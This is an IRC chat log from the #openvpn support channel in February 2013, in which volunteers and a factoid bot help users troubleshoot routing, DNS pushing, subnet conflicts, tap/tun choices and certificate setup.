10:43 -!- brute11k [~brute11k@89.249.235.210] has quit [Read error: Connection reset by peer]
10:57 -!- baobei [~baobei@101.93.91.186] has quit [Ping timeout: 255 seconds]
10:57 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
11:08 -!- raidz_away is now known as raidz
11:17 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
11:18 -!- hotwings [hd@secksy.net] has joined #openvpn
11:19 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn
11:19 -!- mode/#openvpn [+v s7r] by ChanServ
11:25 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 264 seconds]
11:50 -!- coreGrl [~a@host18-17-dynamic.4-87-r.retail.telecomitalia.it] has joined #openvpn
11:50 < coreGrl> hi
11:53 < coreGrl> I've this kind of warning on linux, WARNING: potential route subnet conflict between local LAN [192.168.1.0/255.255.255.0] and remote VPN [192.168.1.20/255.255.255.255] and on linux I can connect to 1.20 on windows 7 it doesn't :( yes I know I've the same ip addresses on the two lan, but there is a way to solve this on windows? on linux it works :(
11:54 < pekster> Fix your network numbering. No, you can't reasonably fix that without fixing your broken network numbering scheme
11:54 < pekster> Pick one of the other 255 /24 networks in the 192.168/16 block.
11:55 < coreGrl> not so easy to achieve I'm not the network manager on both lan :(
11:55 < pekster> I suppose you can see the --client-nat option in the 2.3.x release, but that's a Bad Idea™ that you should never do
11:56 < pekster> Then you need to go slap whoever set up the VPN to use what is probably the single most common network for home routers
11:56 * neilhwatson wonders if pekster is a bot or simply chained to his keyboard.
11:57 < pekster> Turing Complete ;)
12:02 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn
12:03 < hotwings> PUSH: Received control message: 'PUSH_REPLY,topology subnet,route-gateway 10.200.0.1,dhcp-option DNS 208.67.222.222,dhcp-option DNS 208.67.220.220,redirect-gateway def1,ifconfig 10.200.2.8 255.255.252.0' <--- any idea why i keep getting a 10.200.x.x ip instead of a real one?!
12:04 < pekster> That's what the server pushed. Post the server config file if you need help figuring out why that's happening
12:05 < neilhwatson> What IP were you expecting?
12:05 < pekster> Also, you should avoid use of OpenDNS; they violate spec to send you to their advertising servers for invalid domains
12:05 < hotwings> do you happen to know the exact filename (in linux)?.. sorry, im new to openvpn
12:06 < pekster> exact filename of what?
12:06 < neilhwatson> Now I'm sure. Only a bot does PTR lookups :). Look in /etc/openvpn/.
12:06 < hotwings> " Post the server config file if you need help figuring out why that's happening" <-- that
12:07 < pekster> neilhwatson: PTR lookups? No, I just know that IP by heart and also hate OpenDNS with a passion since they violate basic Internet protocol
12:07 < hotwings> i only see "client.cfg".. not *server*
12:07 < pekster> hotwings: The server config would be on your openvpn server, obviously
12:08 < pekster> I suppose you could call it "client.cfg" but that would be a bad name. You could call it "my_dog.jpg" too for all openvpn cares: a config is just a text file
12:10 < hotwings> i didnt name it that, its the stock name
12:10 < pekster> !learn opendns as You should avoid using OpenDNS for pushed DNS servers as they violate spec and send you to ad/search domains for mistyped URLs. Use GoogleDNS instead. See !dns for more info.
12:10 <@vpnHelper> Joo got it.
12:11 < pekster> hotwings: I don't care what you named it. The client is getting an IP issued to it from 10/8 because that is what the server has pushed, usually via an --ifconfig-pool or --server option. Paste your openvpn *server* configuration file if you can't figure out why that's happening
12:12 < pekster> This is completely normal in many setups; it's rare to have enough public IPs to waste them on connecting VPN clients, so I don't really see what's "broken" unless you're expecting to get a globally-routable IP
12:15 < hotwings> by server are you referring to virtual private network daemon. as in: "[ ok ] Starting virtual private network daemon:."
12:15 < pekster> The config file. The actual configuration that openvpn is being started with
12:16 < pekster> Usually it's stored in /etc/openvpn/ on Unix-like systems, but a distro can put this file anywhere it pleases
12:16 < pekster> And I'm talking about this config file on your server. Not your client (where you're getting that IP assigned) but the server that is assigning it
12:17 < sh_t> hey everyone. im using an openvpn client (tap) on top of an (or rather inside of) another openvpn client (tun). There seems to be MTU issues because I can use ICMP but websites don't load. I don't have control over the server side config for the tap adapter. what would be the best way to go about fixing this? increasing the MTU on the tun server and client side?
12:18 < hotwings> the only thing in /etc/openvpn is update-resolv-conf... so i guess i try to figure out where debian puts that stupid file
12:18 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Ping timeout: 245 seconds]
12:19 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn
12:20 < neilhwatson> In Debian /etc/init.d/openvpn reads /etc/openvpn/*.conf
12:20 < pekster> sh_t: You might need a lower --tun-mtu value. Try determining the MTU of the inside tunnel by using the --mtu-test option to the VPN endpoint inside your first tunnel
12:20 < pekster> Or solve the problem by not tunneling VPN tunnels like that ;)
12:21 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has quit [Ping timeout: 248 seconds]
12:21 <@krzee> try to get off tap
12:21 < hotwings> thanks neilhwatson. the only file in my /etc/openvpn/ dir is update-resolv-conf.. so no *.conf there
12:21 <@krzee> what layer2 proto do you need?
12:22 < pekster> I'm more curious why there's a need to run a VPN inside another VPN tunnel personally :)
12:22 <@krzee> ^ sh_t
12:22 < sh_t> krzee: it's just a subscribed vpn that has a provided config. not optimal i know, just trying to work with this
12:22 < sh_t> but I do have control over the outer tun adapter on both ends
12:22 <@krzee> that makes no sense
12:22 <@krzee> dont stack them
12:23 <@krzee> pekster, when i wrote vpnchains link my motivation was to be able to use less trusted boxes to build the outer layer of the darknet, while not trusting them with the data going over the darknet
12:23 -!- ||arifaX [~quassel@unaffiliated/arifax/x-427475] has joined #openvpn
12:24 <@krzee> but that seems to not be his motivation, so i dunno
12:25 <@krzee> https://www.secure-computing.net/wiki/index.php/OpenVPN/VpnChains
12:25 <@vpnHelper> Title: OpenVPN/VpnChains - Secure Computing Wiki (at www.secure-computing.net)
12:25 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn
12:26 < pekster> Right. Same principle as tor, and it's slow for a reason :P
12:26 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn
12:27 <@krzee> actually i caught some weird results, bandwidth did not go down
12:27 <@krzee> actually had higher iperf results
12:27 <@krzee> we talked about it before, you said additional tests should have been done ;]
12:28 < pekster> It doesn't scale; on the Internet at large you end up with more points of failure/latency/dropouts
12:28 < hotwings> this, /etc/default/openvpn, is the only config file of any kind im finding: http://pastebin.com/NUNQBUsd every other file listed in /var/lib/dpkg/info/openvpn.conffiles is a script
12:28 <@krzee> definitely doesnt scale
12:28 <@krzee> not well at least
12:28 < pekster> hotwings: That is not an openvpn config file. You can see samples of actual config files here:
12:28 < pekster> !sample
12:28 <@vpnHelper> "sample" is (#1) http://www.ircpimps.org/openvpn.configs for a working sample config or (#2) DO NOT use these configs until you understand the commands in them, read up on each first column of the configs in the manpage (see !man) or (#3) these configs are for a basic multi-user vpn, which you can then build upon to add lans or internet redirecting
12:28 < pekster> Or at the official howto here:
12:28 < pekster> !howto
12:28 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
12:29 < pekster> hotwings: How did you configure your server if you didn't create an openvpn config file? That is a required part of OpenVPN setup...
12:30 <@krzee> oh and if you want your hand held through configuring it:
12:31 <@krzee> !confgen
12:31 <@vpnHelper> "confgen" is (#1) http://www.doeshosting.com/code/openvpn-confgen.tgz for the bash config generator or (#2) you can use svn co http://www.secure-computing.net/svn/trunk/openvpn-confgen/ or (#3) you must run this in bash
12:31 < hotwings> the direction i was given said to install the openvpn package, download the client, and run it. i did it and it works most of the time but sometimes i get these 10.200.x.x ips and nothing works. so before i would just restart it until it worked again. but i'd rather figure this problem out and solve it for good now.
12:31 <@krzee> i made a lil bash script which holds your hand and walks through it with ya
12:32 < pekster> hotwings: Do you not control the server? If you are not the admin of the server, we cannot help you diagnose problems with the setup...
12:32 < pekster> (especially things like why they're giving you an rfc1918 IP if that's not what you expected)
12:33 <@krzee> ah
12:33 < hotwings> i have full access to the box, meaning root.
12:33 <@krzee> !provider
12:33 <@vpnHelper> "provider" is (#1) We are not your provider's free tech support. We support the free open source app OpenVPN, not your provider. Just because they run openvpn does not mean we are their support team. or (#2) Please contact their support team.
12:33 < pekster> hotwings: The server, right?
12:33 <@krzee> you have root on the server?
12:33 < hotwings> the box openvpn is installed on, yes
12:33 < pekster> OpenVPN is installed on *both* the client and server
12:33 <@krzee> there are 2 boxes openvpn are installed on
12:33 < pekster> I am telling you that I need to see your server config file in order to help you understand the IP you are getting on the client
12:34 <@krzee> well 2+
12:34 < pekster> If you do not control the server, I will be unable to be of any help to you
12:34 < hotwings> then the client and the server are installed on one box because there is only one box
12:34 < pekster> No, there's not. You are connected to *another* system
12:34 < pekster> That's how VPNs work ;)
12:34 <@krzee> you have a vpn provider, right?
12:34 <@krzee> they gave you stuff to install, right?
12:35 < hotwings> the direction i was given said to install the openvpn package, download the client, and run it.
12:35 <@krzee> who gave these directions
12:35 < hotwings> that was done on a single box
14:53 < sofia25> anyone guys...i would like to know your inputs about my openvpn setup ???
14:59 < sofia25> anyone here?
15:00 < sofia25> !welcome
15:00 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum
15:00 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
15:08 < sofia25> I would like to setup a central host (SERVER) that could have access to 5 clients networks (192.168.1.0/24 - Client A, 192.168.2.0/24 - Client B...) in a site-to-site architecture, SERVER can access Client A but Client B cannot access client A...is that possible? Or should i setup a client-server architecture? Which one is the best suitable setup?
15:22 < rob0> Client-server or p2p is not relevant. Each connection makes a tunnel between those two endpoints.
15:22 < rob0> what you probably need is a better understanding of IP routing
15:22 < rob0> !route
15:22 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide or (#4) See !serverlan or !clientlan for steps and troubleshooting flowcharts for LANs behind
15:22 <@vpnHelper> the server or client
15:23 < sofia25> Basically, I needed each branch to be able to route to the home office network, and the home office network to be able to route to each of the branch office networks (but the branches did not need to route to each other).
15:25 < sofia25> it's just that i see openvpn recipes about point-to-point (ex.: ifconfig SERVERIP CLIENTIP) and client-server setup (server 192.168.200.0 255.255.255.0)
16:29 < neilhwatson> Is there a similar command to "redirect-gateway def1" that does not set the default gw, but ensures the tunnel routes through the client's default gw? The client's default gw on the client is dynamic, from the ISP.
16:49 < rob0> Maybe you're asking about --route, but TBH I can't tell.
16:49 < rob0> are you wanting to redirect the gateway?
16:50 < neilhwatson> I do not want to redirect the gateway. I have a bridged setup. It worked when I was redirecting the gateway but fails when I remove push "redirect-gateway def1". I can no longer ping the vpn server.
17:03 < neilhwatson> aha redirect-private
17:03 < sqwerty> is there a way to tell linux clients to use a specific dns server that is supported natively ?
17:07 < neilhwatson> Perhaps push dhcp-option DNS
17:08 < sqwerty> man pages says it just sets an environment variable on linux systems and doesn't actually do anything
17:08 < sqwerty> which seems to be the case
17:09 < rob0> sqwerty, my solution was to use dnsmasq on server and clients
17:12 < sqwerty> ah k. ideally was looking for a solution that could be kept within openvpn configuration, but will have a look cheers
17:20 < rob0> dnsmasq has other benefits as well.
17:20 < rob0> http://rob0.nodns4.us/dnsmasq.html
17:20 <@vpnHelper> Title: DNS in OpenVPN: a better approach (at rob0.nodns4.us)
17:23 <@krzee> [19:08] man pages says it just sets an environment variable on linux systems and doesn't actually do anything
17:23 <@krzee> !pushdns
17:23 <@vpnHelper> "pushdns" is (#1) push "dhcp-option DNS a.b.c.d" to push dns to the client or (#2) http://thread.gmane.org/gmane.network.openvpn.user/25139/focus=25147 see that mail archive for some info on pushing dns or (#3) http://article.gmane.org/gmane.network.openvpn.user/25149 for a perm fix via regedit or (#4) in unix you'll use the update-resolv-conf script or (#5) also
17:23 <@vpnHelper> http://comments.gmane.org/gmane.network.openvpn.user/31975 reports --register-dns as fixing their problems pushing DNS to windows 7
17:23 <@krzee> see #4
17:29 < sqwerty> perfect krzee :)
17:29 < sqwerty> what happens if i give that config to a windows client ?
17:29 < sqwerty> will it blow up when it can't find /etc/openvpn/update-resolv-conf ?
17:30 <@krzee> dont use that option on the windows client, its not needed
17:30 < sqwerty> ye i know. i'm just wondering if i can make a cross-platform config
17:31 * s7r is feeling sexy & free
17:32 <@krzee> no
17:32 <@krzee> :D
17:32 <@krzee> also, dont you want to drop permissions on linux?
17:32 <@krzee> (cant do that in windows)
17:36 < sqwerty> ye true. gonna have to see what happens if i put that in windows client config
17:36 < sqwerty> otherwise i'll give up on the idea :)
17:37 < sqwerty> any idea if update-resolv-conf works on osx ?
17:37 < sqwerty> sorry for the lame questions :P
17:41 < sqwerty> nm i clearly know f all about osx ;]
17:41 < pekster> Tunnelblick ships with its own set of OS X related scripts
17:41 < pekster> DNS is... "different" on macs
17:42 < pekster> They have resolv.conf, but dnsctl re-writes it whenever it feels like it
17:42 < pekster> So you need to use the Apple Way™ when doing DNS
17:45 < uberushaximus> what a special little snowflake
17:46 < pekster> Well, my poking at apple's special way of doing things aside, I've had fewer problems with deployments on that platform than on any other
17:46 < pekster> Linux tends to work fine, but you end up with distro issues if you support end-users on any "Unix-like" platform, and Windows is, well, Windows
17:53 < sqwerty> would you say osx... just works?
17:54 < pekster> If managed/deployed properly, yes
17:54 < pekster> Literally no setup beyond the user dragging my pre-packaged (ie: configuration and everything "inside" the deploy folder as per the Tunnelblick docs) .app file to the Application folder
17:55 < pekster> It all "just works" from there. Of course, magic goes into the process to set up the server and deployment package properly. You need an IT guy who knows what he/she is doing, but that's always the case ;)
17:56 < sqwerty> cool thanks for the advice. will have a look at tunnelblick
18:04 <@krzee> haha !allyouneed = You need an IT guy who knows what he/she is doing. After that it's all easy!
18:05 < pekster> Well, I didn't mean to imply that a custom setup literally works out of the box
18:05 < pekster> It did from our user's perspective, but that's because I did all the hard work weeks before ;)
19:14 < tswett> Ahoy. I'm trying to get an OpenVPN server running. I've generated a bunch of keys, and now I just ran build-dh a second time.
19:14 < tswett> Is that going to cause any problems?
19:20 <@krzee> you can build-dh as many times as you want
19:20 <@krzee> wont hurt anything
19:22 < tswett> *nod* Thanks.
19:22 <@krzee> np
19:36 < rob0> build-dh until you get it right!
19:36 < rob0> build-dh until the cows come home!
19:37 < rob0> build-dh until the sun comes up over Santa Monica Blvd!
19:53 <@krzee> hahah
20:36 < cosmicfires> Hi what's the best port of openvpn for OS-X and where can I find set up docs?
20:36 <@krzee> port?
20:36 <@krzee> !osx
20:36 <@vpnHelper> "osx" is (#1) Tunnelblick includes everything you need to run OpenVPN on OS X. https://code.google.com/p/tunnelblick/ or (#2) Viscosity is another OpenVPN client for OS X, but it is commercial. http://www.thesparklabs.com/viscosity/
20:36 < cosmicfires> version then
20:37 < cosmicfires> how about the version in ports?
20:37 <@krzee> go for it
20:37 <@krzee> its all the same openvpn
20:37 < cosmicfires> I'm looking for docs on setting it up, it didn't make an openvpn/ directory when I installed it
20:38 <@krzee> make your own, anywhere you want
20:38 <@krzee> the macports version doesnt have a startup script, so you get to handle that on your own anyways
20:38 < cosmicfires> can I copy my config from linux and make new client certs?
20:38 < pekster> FWIW, Tunnelblick has fantastic documentation on anything from a basic setup to a corporate deployment solution
20:39 <@krzee> yes
20:39 < cosmicfires> thanks I'll check it out
20:39 < pekster> The config should be nearly (if not completely) identical between Linux and OS X
20:39 < cosmicfires> I need different client certs correct?
20:39 < pekster> Minor stuff might change, such as the path to files and a lack of resolv.conf scripts (Tunnelblick handles that itself)
20:39 <@krzee> yes
20:40 < cosmicfires> thanks
20:59 < ciupicri> can I have global CA -> openvpn CA -> server & client certs and accept only stuff signed by the openvpn CA?
21:01 <@krzee> while the answer is yes, why do you feel the need to have the openvpn CA be intermediate of the global CA?
21:03 < ciupicri> krzee: so that I can delegate stuff and contain better certificates related to openvpn
21:03 < ciupicri> s/contain/separate/
21:03 <@krzee> and why not just have a separate CA for openvpn?
21:05 < ciupicri> hmmm I can't find a reason right now. I've just started the SSL thing with openvpn today. It might be worth a shot to have only the CA for open vpn
21:06 <@krzee> is the global CA one you use for web and stuff? signed by some other company?
21:08 < ciupicri> no, it's just for my use. I haven't bought something from the big companies.
21:09 < ciupicri> as for the other part of the question, yes I was thinking of using the global CA for the web and email servers and so on...
21:17 < ciupicri> anyway, another question that I have is why in the server mode with TLS, I'
21:18 < ciupicri> I'm getting one pair of addresses on the client and another different pair on the server
21:19 < ciupicri> e.g. xxxx.5 & xxxx.6 on the client and xxxx.1 & xxxx.2 on the server
21:19 < rob0> !/30
21:19 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf
21:21 < ciupicri> got it, thank you
21:21 < ciupicri> thank you too, krzee
21:25 <@krzee> yw
--- Day changed Wed Feb 27 2013
05:12 < JackSparrow> hi again, from the client i can ping the server, but not an external IP
05:12 < JackSparrow> with: push "redirect-gateway def1"
05:13 < JackSparrow> in the server log: MULTI: bad source address from client [192.168.0.42], packet dropped
05:15 < JackSparrow> i found i can solve that with a client config dir, is it possible to do that dynamically ?
05:15 < JackSparrow> (or, is that a NAT problem ?)
05:52 < greyeax> how do i create user accounts to login to an openvpn server?
05:52 < greyeax> google doesn't seem to want to give me a straight answer
05:57 < Wintereise> Generate new certificates for that user if you're using public cert based auth.
05:58 < Wintereise> Uname/pw, ...this is script based, depends on your script.
07:06 < JackSparrow> i ran wireshark on my openvpn server, i see ICMP packets from 10.99.1.10 to the IP that my client pings
07:07 < JackSparrow> i think that the server doesn't send back the packets from the ping'd IP
07:26 < JackSparrow> oh, it works.
08:22 < fu_fu> hello, anyone familiar with ports to open on Cisco ASA to allow OVPN passthru?
08:22 < fu_fu> is 1194 sufficient?
08:25 <@dazo> fu_fu: yes, openvpn only uses a single UDP or TCP port ... completely standard port setup
08:29 < fu_fu> can you send me the flowchart link for connection troubleshooting?
08:30 < fu_fu> i get a connection on the server side, but can not pass ping
08:33 < fu_fu> Wed Feb 27 06:32:37 2013 TLS Error: TLS key negotiation failed to occur within 60 seconds (check your network connectivity)
08:35 < fu_fu> server says bad source address also
08:38 < havoc> fu_fu: that error is almost *always* the client FW blocking
08:39 < havoc> if it's windows, just allow all for openvpn.exe
08:40 < fu_fu> ok i will try, but i think the client FW is set to "off"
08:40 < havoc> ok
08:40 < havoc> but I've never seen that error be from anything else
08:40 < havoc> not saying it can't be, just that *I've* never seen it be from anything else
08:43 < fu_fu> havoc, you mean the TLS err right?
08:43 < havoc> 08:33:09 Wed Feb 27 06:32:37 2013 TLS Error: TLS key negotiation failed to occur within 60 seconds (check your network connectivity)
08:43 < havoc> that
08:43 < fu_fu> it got past the TLS error thanks
08:43 < fu_fu> right on
08:43 < havoc> ah, ok
08:44 < fu_fu> even tho the crappy windows firewall is "off"
08:47 < fu_fu> sweet, you rock, looks like i just have to get my routing worked out now
08:47 < fu_fu> unless you know about the bad source address lines, they repeat and i have them muted, but nice to have it clean
10:16 < dpecka> hello
10:16 < dpecka> need to resolve following:
10:18 < dpecka> can I somehow configure server that it requires that the key passphrase is typed and not saved locally on client side in some plaintext file ?
10:19 <@krzee> no, and there would be no way to enforce it 10:23 -!- raidz_away is now known as raidz 10:23 < dpecka> thanks, fair 10:24 <@krzee> i dont like it either 10:33 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 10:40 -!- zhvtar is now known as Zhvtar 10:48 -!- AsadH is now known as zz_AsadH 10:52 -!- odoacre [~antonio@64.235.48.199] has quit [Ping timeout: 276 seconds] 10:52 -!- Saviq [~Saviq@sawicz.net] has quit [Quit: ZNC - http://znc.sourceforge.net] 10:53 -!- Saviq [~Saviq@sawicz.net] has joined #openvpn 10:54 -!- odoacre [~antonio@64.235.48.199] has joined #openvpn 10:59 -!- knobo [~user@ti0125a380-1018.bb.online.no] has quit [Ping timeout: 260 seconds] 11:02 -!- knobo [~user@ti0125a380-1018.bb.online.no] has joined #openvpn 11:06 -!- Varazir [~mircwars@c-94-255-130-138.cust.bredband2.com] has quit [Quit: brb] 11:08 -!- [1]JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has quit [Read error: Connection reset by peer] 11:10 -!- Saviq [~Saviq@sawicz.net] has quit [Quit: ZNC - http://znc.sourceforge.net] 11:11 -!- alex88 [~alex88@unaffiliated/alex88] has joined #openvpn 11:13 < alex88> hi guys, at work we've a tap based vpn, now I wanted to include the vpn for android connection but I needed tap, is possible to use both in the same network range? 11:15 -!- Saviq [~Saviq@sawicz.net] has joined #openvpn 11:26 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 11:28 -!- MeanderingCode [~Meanderin@71-213-181-244.albq.qwest.net] has joined #openvpn 11:41 -!- Varazir [~mircwars@c-94-255-130-47.cust.bredband2.com] has joined #openvpn 11:47 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has quit [Ping timeout: 276 seconds] 11:48 <@plaisthos> !tunortap 11:48 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. 
or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against
11:48 <@vpnHelper> you over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun.
11:48 <@plaisthos> android does not support tap
11:48 <@plaisthos> and mixing of tap /tun is not supported
11:48 < alex88> plaisthos: I know, but I need tap for actual clients
11:48 < alex88> btw I've solved using another subnet
11:48 < alex88> and it worked fine
11:52 < rob0> same network range? Why?
11:52 < rob0> no, your tun VPN should be a separate range.
11:57 < alex88> rob0: the idea was just to have the same clients on the same network, but I've set on a different range and it works fine
11:58 < rob0> if they're all going through the same server, it IS the same network, no? The IP address is just a number. The question is, can it be routed?
11:59 < alex88> rob0: it is the same server but they have 2 different subnets
11:59 < alex88> btw routing works fine
12:00 < alex88> just needed to add push some routes
12:00 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn
12:00 -!- HH [~Userfgfgf@adsl-98-82-180-100.jax.bellsouth.net] has joined #openvpn
12:01 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
12:01 < HH> hi all, not sure if there are people here or not but I dled your vpn and your long instructions are jargon to me so no clue how to make the bloody thing work
12:02 < HH> keep getting fatal errors on key, can't open the vpn
12:03 < HH> it would be awesome if you could do a simple instructions not a bill gates hacker style code from hell type instructions
12:04 -!- erry is now known as ^erry
12:04 -!- HH [~Userfgfgf@adsl-98-82-180-100.jax.bellsouth.net] has quit [Client Quit]
12:05 < dan__t> morning.
been using openvpn for a few years now to get to my lab at home. i don't know if this is better handled in OpenVPN or just by being smarter with how I segregate my home network, but is there a way I can limit VPN users to specific hosts inside of my VPN?
12:05 -!- ^erry is now known as erry
12:07 < EugeneKay> Sure. Hand out static IPs and firewall
12:07 < EugeneKay> Don't use the --client-to-client uption
12:07 < dan__t> yea, firewalls would do it heh
12:07 < EugeneKay> option
12:08 * EugeneKay can't type
12:09 < rob0> haha, if "bill gates" is his best example of "hacker", HH is not going to do well in Unix and networking.
12:11 < rob0> dan__t, in addition to what EugeneKay said, you'll probably want to use a --client-config-dir and --ccd-exclusive.
12:11 < dan__t> right, i can do that
12:11 < dan__t> i do use ccd
12:13 -!- MeanderingCode [~Meanderin@71-213-181-244.albq.qwest.net] has quit [Remote host closed the connection]
12:13 < dan__t> awesome thanks.
12:14 < dan__t> http://securityskittles.wordpress.com/2012/03/14/two-factor-authentication-for-openvpn-on-centos-using-google-authenticator/
12:14 < dan__t> wow.
12:14 <@vpnHelper> Title: Two Factor authentication for OpenVPN on CentOS using Google Authenticator | Security Skittles Blog (at securityskittles.wordpress.com)
12:15 -!- Saviq [~Saviq@sawicz.net] has quit [Quit: ZNC - http://znc.sourceforge.net]
12:15 -!- master_of_master [~master_of@p4FF24E6E.dip.t-dialin.net] has joined #openvpn
12:16 -!- Saviq [~Saviq@canonical/saviq] has joined #openvpn
12:18 -!- MeanderingCode [~Meanderin@71-213-181-244.albq.qwest.net] has joined #openvpn
12:22 -!- MeanderingCode_ [~Meanderin@71-213-181-244.albq.qwest.net] has joined #openvpn
12:22 -!- MeanderingCode [~Meanderin@71-213-181-244.albq.qwest.net] has quit [Ping timeout: 264 seconds]
12:28 < dan__t> bloops.
12:39 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn
12:39 -!- mode/#openvpn [+v s7r] by ChanServ
12:41 -!- dextro_ [~dextro_@65.110.29.202] has joined #openvpn
12:42 < dextro_> i am using client-config-dir /etc/openvpn/ccd
12:42 < dextro_> to ifconfig-push 10.8.0.6 10.8.0.5
12:43 < dextro_> to a cert called 'bell2'
12:43 < dextro_> but when a client cert 'bearclaw' which has no ccd signs on
12:43 < dextro_> it gets the ip
12:45 < dextro_> i dont want to ccd for 'bearclaw' because it has more than one machine using the cert and i dont want them all being forced to same ip
12:47 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has joined #openvpn
12:48 -!- mndo [~mndo@bl17-94-90.dsl.telepac.pt] has quit [Quit: going home]
12:51 -!- fu_fu [~Adium@c-107-3-50-191.hsd1.vt.comcast.net] has left #openvpn []
12:53 < neilhwatson> In bridged mode why would the server not be able to ping the client? Via the VPN the client exists on the server's network. Iptables are empty.
12:53 < neilhwatson> The client can ping the server and any hosts on that network.
12:54 <@krzee> dextro_, push an ip outside of the pool
12:57 * dextro_ slaps self
12:57 < dextro_> duh thanks lol
12:58 -!- brute11k [~brute@89.249.231.13] has joined #openvpn
12:59 < rob0> shared cert=bad idea
13:02 -!- master_of_master [~master_of@p4FF24E6E.dip.t-dialin.net] has quit [Ping timeout: 252 seconds]
13:03 -!- master_of_master [~master_of@p4FF24E6E.dip.t-dialin.net] has joined #openvpn
13:07 -!- Rolybrau [~Rolybrau@unaffiliated/rolybrau] has joined #openvpn
13:13 < neilhwatson> I have working bridged tunnel, ipv4. When I activate it ipv6 route table is altered. How can I prevent that?
13:17 < dan__t> once openvpn is in daemon mode, how can I terminate the connection, short of kill -9?
13:19 < rob0> see SIGNALS in the man page, also look at --management
13:19 < dan__t> management...
13:19 < dan__t> i was searching for "admin"
13:19 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer]
13:19 < dan__t> thanks.
13:35 -!- xxoxx [~xxoxx@tor/regular/xxoxx] has joined #openvpn
13:35 < xxoxx> hello
13:42 -!- Rolybrau [~Rolybrau@unaffiliated/rolybrau] has quit [Quit: Rolybrau]
13:45 -!- xxoxx [~xxoxx@tor/regular/xxoxx] has quit [Quit: Leaving]
13:46 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn
13:53 -!- dextro_ [~dextro_@65.110.29.202] has quit []
14:08 -!- brute11k [~brute@89.249.231.13] has quit [Quit: Leaving.]
14:16 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has joined #openvpn
14:44 -!- WITRchris [~chris@unaffiliated/hyperactivecrond] has joined #openvpn
14:44 < WITRchris> this is a weird situation
14:44 < WITRchris> but say i've got a pfsense box behind NAT
14:44 < WITRchris> and i've got an openvpn server with a public ip
14:45 < WITRchris> is it possible to have clients connecting to the openvpn server be able to route through pfsense to its internal net?
14:45 < WITRchris> so like client (wherever) -> openvpn server -> pfsense -> internal net
14:45 < WITRchris> i would think that'd be a pretty common scenario
14:45 < rob0> pfsense as client?
If so:
14:45 < rob0> !clientlan
14:45 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a
14:46 <@vpnHelper> better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png
14:46 < WITRchris> yep
14:47 < WITRchris> thanks a lot rob0
14:56 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn
14:58 < rob0> yw
15:04 -!- greyeax [~grey@cpe-108-185-215-179.socal.res.rr.com] has joined #openvpn
15:14 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit []
15:21 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit []
15:26 < WITRchris> hm
15:26 < WITRchris> i added another 'route' statement to my openvpn server's config
15:26 < WITRchris> but openvpn isn't adding a route as reported by netstat -r
15:32 < WITRchris> weird, it's pushing it to the clients though
15:32 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has quit [Quit: Leaving.]
15:34 < pekster> WITRchris: 'route' will add it to the system it's specified on, compared with a 'push "route ..."' statement that sends it to clients.
Normally on a server you need both to support client LANs, and need to restart the service after making the change
